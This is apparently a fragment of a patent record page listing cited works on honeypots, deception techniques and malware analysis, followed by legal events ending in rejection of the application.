Yoshioka et al. Your sandbox is blinded: Impact of decoy injection to public malware analysis systems
Pouget et al. A pointillist approach for comparing honeypots
Anderson et al. Seven deadliest USB attacks
Karthikeyan et al. Honeypots for network security
Gunawan et al. On the review and setup of security audit using Kali Linux
Rana et al. Offensive security: Cyber threat intelligence enrichment with counterintelligence and counterattack
Mphago et al. Deception in dynamic web application honeypots: Case of glastopf
Efendi et al. A survey on deception techniques for securing web application
Maybaum et al. Technical methods, techniques, tools and effects of cyber operations
Djamaluddin et al. Web deception towards moving target defense
Reti et al. Escape the fake: Introducing simulated container-escapes for honeypots
Fraunholz et al. Introducing FALCOM: A multifunctional high-interaction honeypot framework for industrial and embedded applications
Innes et al. Honeypots: How do you know when you are inside one?
Gadelrab et al. Execution patterns in automatic malware and human-centric attacks
Katsinis et al. A framework for intrusion deception on web servers
EP4235470A1 (en) Method and network component for protecting networked infrastructures
Malhotra et al. Computer Malwares Influencing The Cyber World: A Quantitative Purview

Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination
RJ01 Rejection of invention patent application after publication (Application publication date: 20201225)